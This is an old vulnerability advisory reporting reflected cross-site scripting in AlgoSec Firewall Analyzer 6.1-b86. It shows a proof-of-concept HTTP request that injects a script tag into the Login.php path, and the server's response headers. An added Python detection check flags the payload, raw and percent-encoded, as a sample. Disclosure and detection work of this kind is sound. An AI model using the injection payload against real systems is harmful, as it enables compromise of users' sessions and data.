AlgoSec Firewall Analyzer version 6.1-b86 suffers from a cross site scripting vulnerability.
a20ec40cfaafacdd8fd65a06cbfa4de1919a866f9d3478bbe4e587ca7a43d435
AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS) Vulnerability
#Date- 7/8/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerability
AlgoSec Firewall Analyzer is prone to a cross-site scripting (XSS)
vulnerability because the application fails to properly
sanitize user-supplied input.
#Impact
A successful exploit could allow an attacker to compromise the application,
access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1
Host: 172.28.154.163
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Date: Wed, 7 Aug 2013 15:59:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
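
A detection check for the request pattern shown above, where markup is appended as extra path segments after Login.php. This is an added example, not part of the original advisory or AlgoSec's code; the function names and every sample line other than the first are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Characters needed to break out of an HTML attribute or open a tag.
HTML_META = re.compile(r"[<>\"']")
# METHOD SP request-target SP HTTP/x.y; the target may hold raw quotes/brackets.
REQUEST_LINE = re.compile(r"^([A-Z]+) (.+) HTTP/\d\.\d$")
# Script name ending in .php followed by extra path segments (path-info).
PATH_INFO = re.compile(r"^(.*?\.php)(/[^?]*)", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_path_info(request_line):
    """Return (script, path_info) when path-info holds HTML metacharacters, else None."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return None
    p = PATH_INFO.match(decode_fully(m.group(2)))
    if not p:
        return None
    script, path_info = p.groups()
    return (script, path_info) if HTML_META.search(path_info) else None


# First line is the request from the advisory; the others are constructed samples.
SAMPLES = [
    "GET /afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1",
    "GET /afa/php/Login.php/%3E%27%3E%3CScRiPt%3Ealert(11111111)%3C/ScRiPt%3E HTTP/1.1",
    "GET /afa/php/Login.php HTTP/1.1",
    "GET /afa/php/Login.php?user=admin HTTP/1.1",
    "GET /index.php/reports/2013 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print("ALERT" if suspicious_path_info(line) else "ok   ", line)
```

The same check can run as a pre-filter in front of the application or over stored access logs; legitimate path-info such as `/index.php/reports/2013` passes because it contains none of the flagged characters.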